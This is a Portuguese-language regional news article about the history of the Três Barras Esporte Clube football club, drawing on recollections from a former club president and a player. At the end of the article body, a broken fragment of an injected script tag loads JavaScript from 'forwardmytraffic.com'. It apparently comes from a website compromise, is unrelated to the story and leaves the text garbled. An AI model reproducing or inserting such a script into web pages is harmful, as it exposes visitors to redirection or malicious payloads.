InícioCuriosidades do PassadoTrês Barras Esporte Clube: História e Lição de Vida em prol do...

Três Barras Esporte Clube: História e Lição de Vida em prol do Esporte.

Últimas notícias

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Mega-Sena sorteia nesta quinta-feira prêmio acumulado em R$ 72 milhões

As seis dezenas do concurso 2.714 da Mega-Sena serão...

Pinhão, pipoteca e maconha; Polícia militar prende traficante em Três Barras

Na quarta-feira, 17, por volta das 18h10, policiais militares...

Futebol, no tempo da serraria Lumber, foi orgulho dos tresbarrenses no início do século XX. Com o término das atividades da serraria, o futebol, numa segunda fase, marcou a vida da população local. Lineu Pacheco recorda o início de suas atividades como presidente do Três Barras Esporte Clube.

 

Video: Lineu Pacheco

Paixão pelo futebol era o que não faltava para o jogador Canhota (Ary Andryeiak). Ele relata como o futebol movimentava as tardes de domingo, atraindo os torcedores para o estádio “Arthur Ferreira Ribas, localizado na sede do Campo de Instrução Marechal Hermes CIMH.

 

Vídeo Canhota 1

 

“Jogador de futebol por amor à camisa”. Mesmo, sem salários, com muitas dificuldades o clube participava de diferentes campeonatos. Canhota lembra da partida em que fez dois gols e classificou o Três Barras Esporte Clube.

 

Video Canhota

 

A história do futebol tresbarrense é lição de vida em prol do esporte. Nos dias atuais, investimentos no setor podem garantir espaços de lazer e uma adolescência saudável para a população local. Colocando em prática a frase do filósofo romano Juvenal: “Mens sana in corpore sano” (uma mente sã num corpo são), podemos evitar muitos dos problemas vividos na atual sociedade…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.